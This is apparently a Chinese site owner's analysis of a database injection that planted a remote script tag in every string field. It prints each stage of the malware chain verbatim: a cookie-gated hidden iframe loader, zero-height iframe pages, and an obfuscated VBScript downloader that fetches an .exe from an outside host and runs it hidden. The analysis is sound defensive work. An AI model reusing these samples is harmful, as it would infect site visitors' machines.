今天发现公司网站的数据库中,所有字符串字段都被插入了一段代码,内容如下:
<!-- Injected payload as quoted by the article from the database's string fields: a remote script include with an unquoted src pointing at a third-party host. Any page that outputs such a field without HTML-escaping will load 0.js in the visitor's browser. -->
<script src=http://ucmal.com/0.js></script>
打开这个 js 文件,代码如下:
// Cookie helper from the quoted 0.js sample: stores name=value with an expiry relative to now.
//   name  - cookie name, concatenated as-is (not encoded)
//   value - cookie value, passed through escape() before being stored
function setCookie(name,value)
{
var Days = 1;
var exp = new Date();
// Despite the variable name, the offset is Days*1*60*60*1000 ms, i.e. one hour;
// the 24-hour form survives only in the trailing comment.
exp.setTime(exp.getTime() + Days*1*60*60*1000);//Days*24*60*60*1000;
// No path or domain attribute is given, so the browser's defaults apply.
document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
}
// Cookie lookup from the quoted 0.js sample; here it doubles as a once-per-cookie-lifetime gate.
//   name - cookie name; inserted into the RegExp without escaping
// Returns the unescaped cookie value when the cookie exists. When it does not,
// the function writes an iframe into the page, sets the marker cookie, and returns null.
// Analysis note: while the marker cookie is alive the iframe is not written again,
// so re-testing an affected page from the same browser profile may show nothing;
// clear cookies (or use a fresh profile) when reproducing.
function getCookie(name)
{
var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
if(arr != null)
{
// Marker present: return its value and do nothing else.
return unescape(arr[2]);
}
else
{
// height=0 keeps the frame out of sight; the src is the next-stage page quoted later in the article.
document.writeln("<iframe src='http://index.htm1.ws/117.htm?id=mg' width=100 height=0><\/iframe>");
// The marker name and value are hard-coded ("Lin"/"ok"), independent of the `name` argument.
setCookie("Lin","ok");
return null;
}
}
// Entry point of the sample: the check runs as soon as the script is loaded; the return value is discarded.
getCookie("Lin")
查看http://index.htm1.ws/117.htm?id=mg文件,代码如下:
<!-- Content of 117.htm as quoted by the article: three zero-height iframes that pull further pages from htm1.ws (014.htm, r2.htm, bd.htm), followed by two script includes from 51yes.com and 51.la. The last two look like third-party visit-counter scripts, presumably how the operator tracks hits; confirm before treating those hosts as malicious in themselves. -->
<iframe src=http://htm1.ws/www/014.htm width=100 height=0></iframe>
<iframe src=http://htm1.ws/www/r2.htm width=100 height=0></iframe>
<iframe src=http://htm1.ws/www/bd.htm width=100 height=0></iframe>
<script language="javascript" src="http://count36.51yes.com/click.aspx?id=360631815&logo=1"></script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1519290.js"></script>
对于下面三个文件,我们分析如下:
http://htm1.ws/www/014.htm页面
<script language=VBScript>
' Captured sample from 014.htm, kept verbatim for analysis. Read top to bottom it:
'   1. builds an <object> element and assigns it a CLSID assembled from string fragments,
'   2. uses that element's CreateObject to obtain an HTTP client, a file-system object,
'      a stream object and a shell object,
'   3. fetches an executable, saves it and a small launcher script into the temp folder,
'   4. runs the launcher with a hidden window.
' Nearly every class name, verb and the CLSID are split into pieces and concatenated at
' run time, so plain substring signatures on the page source will not match; detection
' should normalise the concatenations or key on behaviour (a browser process writing
' .pif/.vbs files into the temp folder and starting a script host).
' NOTE(review): this presumably only works where the browser still lets this ActiveX class
' create arbitrary COM objects; on a patched or hardened system the CreateObject calls
' should fail - verify on the affected clients.

' Errors are suppressed, so a failed step is silent to the visitor.
On Error Resume Next
' URL of the executable that the script retrieves.
Cike = "http://www.axgzba2.com/x/2.exe"
Set Cike2 = document.createElement("object")
' Fragments below concatenate (see SetAttribute) to
' "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36".
' NOTE(review): this CLSID is commonly associated with the RDS.DataSpace control - confirm.
Cikeid="clsid:"
Cikeidx="BD96"
Cikeid2="C556-65"
Cikeid3="A3-11D"
Cikeid4="0-98"
Cikeid5="3A-00C"
Cikeid6="04FC29E36"
' Concatenates to "Microsoft.XMLHTTp" (ProgIDs are case-insensitive).
Cike3="Microsoft.X"
Cike4="MLHTTp"
Cike2.SetAttribute "classid", Cikeid&Cikeidx&Cikeid2&Cikeid3&Cikeid4&Cikeid5&Cikeid6
Cike5=Cike3&Cike4
' All further COM objects are created through the <object> element rather than directly.
Set loveCike = Cike2.CreateObject(Cike5,"")
' Third argument False = synchronous request; the response body is used further down.
loveCike.Open "GET", Cike, False
loveCike.Send
' File names used for the dropped payload (.pif) and its launcher (.vbs).
Qq_123456="microsofts.pif"
Qq_123456s="microsofts.vbs"
' Concatenates to "Scripting.FileSystemObject".
Q123456="Scripting."
Q123456s="FileSyst"
Q123456ss="emObject"
' Concatenates to "Adodb.stream".
Q123456sss="Adod"
Q123456ssss="b.stream"
Q123456sssss=Q123456sss&Q123456ssss
Set chilam = Cike2.createobject(Q123456&Q123456s&Q123456ss,"")
' GetSpecialFolder(2) is the temporary folder; both file names become full paths inside it.
Set yingying = chilam.GetSpecialFolder(2)
Qq_123456=chilam.BuildPath(yingying,Qq_123456)
Qq_123456s=chilam.BuildPath(yingying,Qq_123456s)
Set chilams = Cike2.createobject(Q123456sssss,"")
' Type 1 = binary stream: the HTTP response body is written out as the .pif file
' (save option 2 = overwrite if the file exists).
chilams.type=1
chilams.Open
chilams.Write loveCike.ResponseBody
chilams.Savetofile Qq_123456,2
chilams.Close
' Type 2 = text stream: writes a two-line launcher that creates Wscript.Shell and runs the .pif path.
chilams.Type=2
chilams.Open
chilams.WriteText "Set LoveCike = CreateObject(""Wscript.Shell"")"&vbCrLf&"LoveCike.run ("""&Qq_123456&""")"
chilams.Savetofile Qq_123456s,2
chilams.Close
' Concatenates to "Shell.Application".
cute="Shell.Applica"
qq="tion"
Set cute_qq = Cike2.createobject(cute&qq,"")
' Single letters concatenate to the verb "Open".
Qq123456="O"
Qq123456s="p"
Qq123456ss="e"
Qq123456sss="n"
' Runs the launcher .vbs; the final argument 0 requests a hidden window.
cute_qq.SHellExECuTe Qq_123456s,"","",Qq123456&Qq123456s&Qq123456ss&Qq123456sss,0
</script>
<!-- Trailing part of 014.htm as quoted: on window load, init() calls document.write(""). A document.write issued after the page has finished loading replaces the current document, so this presumably blanks the frame once the script above has run; confirm. The listing stops at the opening body tag; the rest of the page is not shown. -->
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body >
http://htm1.ws/www/r2.htm页面
文章未完,内文分页: [1] [2]
From: 本站原创

